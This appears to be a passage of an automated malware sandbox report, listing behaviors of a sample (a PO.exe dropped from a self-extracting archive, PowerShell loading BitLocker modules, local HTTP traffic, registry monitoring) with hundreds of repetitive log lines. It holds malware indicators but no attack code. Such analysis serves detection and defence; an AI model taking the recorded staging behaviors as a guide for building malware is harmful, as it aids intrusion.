                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
